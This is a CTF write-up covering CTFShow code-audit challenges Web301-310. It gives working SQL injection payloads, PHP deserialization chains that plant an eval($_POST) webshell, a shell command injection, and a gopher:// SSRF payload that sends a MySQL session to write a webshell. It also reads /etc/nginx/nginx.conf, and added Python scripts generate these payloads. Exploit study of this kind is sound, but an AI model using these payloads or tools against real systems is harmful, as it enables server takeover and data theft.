CTFShow Code Audit


  • Web301
  • Web302
  • Web303
  • Web304
  • Web305
  • Web306
  • Web307
  • Web308
  • Web309
  • Web310


Web301

Challenge environment. A pass with Seay's automatic audit turned up nothing.
Reading it by hand instead: one SQL injection with no filtering whatsoever.
payload
userid=1' union select 1#&userpwd=1
The UNION row is what the login code compares the submitted password against, so the attacker supplies both sides of the comparison and any userpwd that matches the injected value logs in.



Web302

One filter has been added: the submitted password is run through sds_decode() before the comparison, so the UNION row has to carry sds_decode(userpwd) rather than the raw value.
Work the value out locally:

function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode('1');
//d9c77c4e454869d5d8da3b4be79694d3

payload
userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#&userpwd=1



Web303

Seay flags the injection point; this time admin / admin logs in directly.
Departments can be added, and dpt_name is concatenated into the INSERT. Closing the quote, assigning a subquery to the next column (sds_address) and commenting out the remainder stores the subquery's result in the new row, where it can be read back from the department listing.
payload
dpt_name=1',sds_address =(select database())#

dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#

dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#

dpt_name=1',sds_address =(select flag from sds_fl9g)#
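To make the Web301 to Web303 payload mechanics runnable offline, here is an added example (my code, not the challenge's source) that re-creates both injection points in SQLite. Table and column names follow the page (sds_user, sds_password, sds_fl9g); the schema, the sample rows, the flag value and the helper names (make_db, check_login, login_payload, add_department, dpt_payload) are constructed. MySQL's '#' comment becomes SQLite's '--' and information_schema becomes sqlite_master; the shape of the attack is unchanged.

```python
# Added example, not the challenge source: SQLite stand-in for the Web301-Web303
# injection points. Schema, rows and flag are constructed; only the names follow the page.
import base64
import hashlib
import sqlite3


def sds_decode(s):
    """Python port of the page's sds_decode(): md5(md5(s . md5(base64("sds"))) . "sds")."""
    inner = hashlib.md5(base64.b64encode(b"sds")).hexdigest()
    mid = hashlib.md5((s + inner).encode()).hexdigest()
    return hashlib.md5((mid + "sds").encode()).hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table sds_user (id integer primary key, sds_username text, sds_password text);
        insert into sds_user (sds_username, sds_password) values ('admin', 'not-the-real-hash');
        create table sds_dpt  (id integer primary key, sds_name text, sds_address text);
        create table sds_fl9g (flag text);
        insert into sds_fl9g values ('ctfshow{constructed_sample_flag}');
    """)
    return db


def check_login(db, username, userpwd, transform=lambda p: p):
    """Web301/302 pattern: username is concatenated into the query and the first row's
    sds_password is compared with the submitted password after `transform`
    (identity in Web301, sds_decode in Web302)."""
    sql = (f"select sds_password from sds_user where sds_username='{username}' "
           "order by id limit 1")
    row = db.execute(sql).fetchone()
    return row is not None and row[0] == transform(userpwd)


def login_payload(userpwd, transform=lambda p: p):
    """UNION lets the attacker author the row being compared: inject whatever
    transform(userpwd) evaluates to, and the check passes without knowing any password."""
    return {"userid": f"1' union select '{transform(userpwd)}'--", "userpwd": userpwd}


def add_department(db, dpt_name):
    """Web303 pattern: dpt_name goes straight into the INSERT. Returns the stored
    sds_address of the new row, which is what the listing shows back to the user."""
    sql = f"insert into sds_dpt (sds_name, sds_address) values ('{dpt_name}', 'n/a')"
    cur = db.execute(sql)
    return db.execute("select sds_address from sds_dpt where id=?", (cur.lastrowid,)).fetchone()[0]


def add_department_safe(db, dpt_name):
    """Same operation with a bound parameter: the payload is stored as an inert string."""
    cur = db.execute("insert into sds_dpt (sds_name, sds_address) values (?, 'n/a')", (dpt_name,))
    return db.execute("select sds_address from sds_dpt where id=?", (cur.lastrowid,)).fetchone()[0]


def dpt_payload(subquery):
    """Close the quoted name, supply the next column as a subquery, comment out the rest."""
    return f"1',({subquery}))--"


if __name__ == "__main__":
    db = make_db()
    p = login_payload("1", sds_decode)
    print(check_login(db, p["userid"], p["userpwd"], sds_decode))          # True
    print(add_department(db, dpt_payload("select flag from sds_fl9g")))   # the sample flag
```

The transform-before-compare in Web302 buys nothing once the attacker controls the row returned by the query; the only fix is to stop the attacker controlling the query, which is what the parameterised add_department_safe shows for the INSERT.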



Web304

A global WAF is added:

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

Hm. The previous method still gets the flag. Note what that regex actually does: with the /i flag it matches any digit, letter or hyphen, so on whatever input it is applied to nothing meaningful would get through; since the department-add injection still works, that path evidently never passes through it. Only the flag table's name has changed, to sds_flaag:

dpt_name=1',sds_address =(select flag from sds_flaag)#



Web305

Seay finds a file write, and there is a deserialization point as well.
Build the serialization chain to write a one-line webshell:

class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    // sink: on destruction the object writes $password into the file named by $username
    public function __destruct(){
        file_put_contents($this->username, $this->password);
    }
}
// both the file name and its content come from the serialized object
echo urlencode(serialize(new user('1.php','<?php eval($_POST[1]);?>')));
//O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D

Connected with AntSword but could not find the flag; it turned out to be in the database.



Web306

The deserialization point in login.php.
Build the chain and write the one-line shell:

class dao{
    // private: serialize() emits the name as "\0dao\0conn" (length 9), visible in the decoded payload
    private $conn;

    public function __construct(){
        $this->conn=new log();
    }

    // dao::__destruct() calls close() on whatever $conn holds
    public function __destruct(){
        $this->conn->close();
    }
}
class log{
    public $title='1.php';
    public $info='<?php eval($_POST[1]);?>';

    // log::close() is the file-write sink: $info is written to the file named by $title
    public function close(){
        file_put_contents($this->title, $this->info);
    }

}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319


Web307

Plain enough: $this->config->cache_dir ends up inside a shell command, so injecting into it is all it takes to write the shell.

class config{
	// cache_dir is interpolated into a shell command; the leading ';' terminates whatever precedes it.
	// '\$' survives PHP's single quotes as-is, so the shell's double quotes don't expand $_POST.
	public $cache_dir = ';echo "<?php eval(\$_POST[1])?>" > 1.php;';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pPz4iID4gMS5waHA7Ijt9fQ==


Web308

Again, start from the deserialization in login.php and look for a chain.
Clearly the idea is to let $update_url flow into checkUpdate and use it for SSRF; MySQL has no password. Decoded, the gopher payload below is a complete MySQL client session written blind: a handshake response logging in as root with an empty auth response, then COM_QUERY with select '<?php eval($_POST[360])?>' into outfile '/var/www/html/1.php', then COM_QUIT.

class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
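Added example, not part of the write-up: the Web308 gopher payload rebuilt from its parts, so the MySQL packets inside it can be read rather than pasted. The capability flags, client attributes and SQL are the ones in the payload above; the function names (packet, handshake_response, com_query, gopher_url, split_packets) are mine. It needs no network.

```python
# Added example, not code from the challenge: builds and decodes the Web308 gopher://
# MySQL payload. Constants below are copied from the payload on the page.
import struct
from urllib.parse import unquote_to_bytes

CAPABILITIES = b"\x85\xa6\xff\x01"   # client capability flags as sent in the page's payload (little-endian)
CLIENT_ATTRS = {                      # CLIENT_CONNECT_ATTRS key/value pairs from the page's payload
    b"_os": b"Linux",
    b"_client_name": b"libmysql",
    b"_pid": b"27255",
    b"_client_version": b"5.7.22",
    b"_platform": b"x86_64",
    b"program_name": b"mysql",
}
# The page's payload, kept here so the rebuilt one can be compared against it.
PAGE_PAYLOAD = "gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01"


def packet(payload, seq):
    """Frame one MySQL packet: 3-byte little-endian length, 1-byte sequence id, payload."""
    assert len(payload) < 0xFFFFFF
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def lenenc(data):
    """Length-encoded string; everything here is under 251 bytes, so a single length byte."""
    assert len(data) < 251
    return bytes([len(data)]) + data


def handshake_response(user, attrs=CLIENT_ATTRS):
    """HandshakeResponse41 with an EMPTY auth-response. gopher only writes, so the server's
    greeting (and its salt) is never read; that is fine only because the account has no
    password, which is the Web308 situation and why Web309 needs a different target."""
    body = CAPABILITIES
    body += struct.pack("<I", 0x01000000)   # max packet size
    body += b"\x21"                          # character set 33 = utf8_general_ci
    body += b"\x00" * 23                     # reserved
    body += user + b"\x00"                   # NUL-terminated user name
    body += lenenc(b"")                      # auth-response of length 0: no password
    body += b"mysql_native_password\x00"     # auth plugin name
    body += lenenc(b"".join(lenenc(k) + lenenc(v) for k, v in attrs.items()))
    return packet(body, seq=1)               # seq 1: it answers the greeting, which is seq 0


def com_query(sql):
    return packet(b"\x03" + sql, seq=0)      # 0x03 = COM_QUERY; each command restarts the sequence


def com_quit():
    return packet(b"\x01", seq=0)            # 0x01 = COM_QUIT


def gopher_url(host, port, packets):
    """gopher:// sends the selector after '_' verbatim, so every byte is percent-encoded."""
    raw = b"".join(packets)
    return f"gopher://{host}:{port}/_" + "".join("%%%02x" % b for b in raw)


def web308_payload():
    sql = b"select '<?php eval($_POST[360])?>' into outfile '/var/www/html/1.php'"
    return gopher_url("127.0.0.1", 3306, [handshake_response(b"root"), com_query(sql), com_quit()])


def split_packets(url):
    """Inverse view: decode a gopher selector back into (seq, payload) tuples for inspection."""
    raw = unquote_to_bytes(url.split("/_", 1)[1])
    out, i = [], 0
    while i < len(raw):
        n = int.from_bytes(raw[i:i + 3], "little")
        out.append((raw[i + 3], raw[i + 4:i + 4 + n]))
        i += 4 + n
    return out


if __name__ == "__main__":
    for seq, payload in split_packets(PAGE_PAYLOAD):
        print(seq, len(payload), payload[:40])
```

Two things decide whether this lands: the SELECT ... INTO OUTFILE needs the MySQL account to hold FILE and secure_file_priv to permit /var/www/html, and the web root must be readable by the web server afterwards. Swap the SQL for anything else once the rest of the session is known good.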


Web309

This time MySQL has a password, so it is presumably Redis or FastCGI instead; same approach.



Web310

This time, if you hit FastCGI the same way as in the previous challenge and upload a one-line shell, the upload succeeds, but AntSword cannot read the flag once connected. Strange; not sure why.

Looking at a more experienced player's approach: read nginx.conf, the server's config file:

class config{
    public $update_url ="file:///etc/nginx/nginx.conf";
}
class dao{
    private $config;

    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=

That shows where the flag is served, port 4476, so read that port:

class config{
    public $update_url ="http://127.0.0.1:4476/";
}
class dao{
    private $config;

    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMjoiaHR0cDovLzEyNy4wLjAuMTo0NDc2LyI7fX0=

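The chains in Web305 through Web310 all hinge on one detail: dao's property is private, so serialize() emits its name as "\0dao\0config" with length 11, and a hand-written s:6:"config" would populate a public property the gadget never reads. As an added example (mine, not code from the challenges), here is a minimal PHP serialize() in Python that handles that mangling and reproduces every payload on this page; PhpObject, php_serialize, mangle, dao_with and the *_payload helpers are my names.

```python
# Added example, not code from the challenges: a small PHP serialize() in Python for
# crafting unserialize() payloads offline. Class and property names follow the page.
import base64
from urllib.parse import quote_plus


class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, value) properties."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def mangle(cls, name, visibility):
    # PHP stores non-public property names with NUL-delimited prefixes, and the length
    # prefix counts those NULs: private $config of class dao becomes s:11:"\0dao\0config".
    if visibility == "private":
        return f"\0{cls}\0{name}"
    if visibility == "protected":
        return f"\0*\0{name}"
    return name


def php_serialize(value):
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(value.cls, n, vis)) + php_serialize(v)
            for n, vis, v in value.props
        )
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'   # length is in bytes, not characters
    if value is None:
        return "N;"
    raise TypeError(f"unsupported type: {type(value).__name__}")


SHELL = "<?php eval($_POST[1]);?>"   # the one-line shell used on the page


def dao_with(prop_name, inner):
    """The shared outer gadget: class dao with a private property holding `inner`."""
    return PhpObject("dao", [(prop_name, "private", inner)])


def web305_payload():
    """user::__destruct() writes $password into the file $username."""
    user = PhpObject("user", [("username", "public", "1.php"), ("password", "public", SHELL)])
    return quote_plus(php_serialize(user))


def web306_payload():
    """dao::__destruct() -> log::close() -> file_put_contents($title, $info)."""
    log = PhpObject("log", [("title", "public", "1.php"), ("info", "public", SHELL)])
    return base64.b64encode(php_serialize(dao_with("conn", log)).encode()).decode()


def web307_payload():
    """config->cache_dir reaches a shell command; the raw string keeps the '\\$' literal."""
    cfg = PhpObject("config", [("cache_dir", "public", r';echo "<?php eval(\$_POST[1])?>" > 1.php;')])
    return base64.b64encode(php_serialize(dao_with("config", cfg)).encode()).decode()


def ssrf_payload(update_url):
    """Web308-Web310: config->update_url is the URL checkUpdate fetches."""
    cfg = PhpObject("config", [("update_url", "public", update_url)])
    return base64.b64encode(php_serialize(dao_with("config", cfg)).encode()).decode()


if __name__ == "__main__":
    print(web306_payload())
    print(ssrf_payload("file:///etc/nginx/nginx.conf"))
```

Decoding any of the base64 strings above with base64 -d | xxd makes the NUL bytes around "dao" visible; that is the quickest check when a hand-built chain "does nothing" on unserialize().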
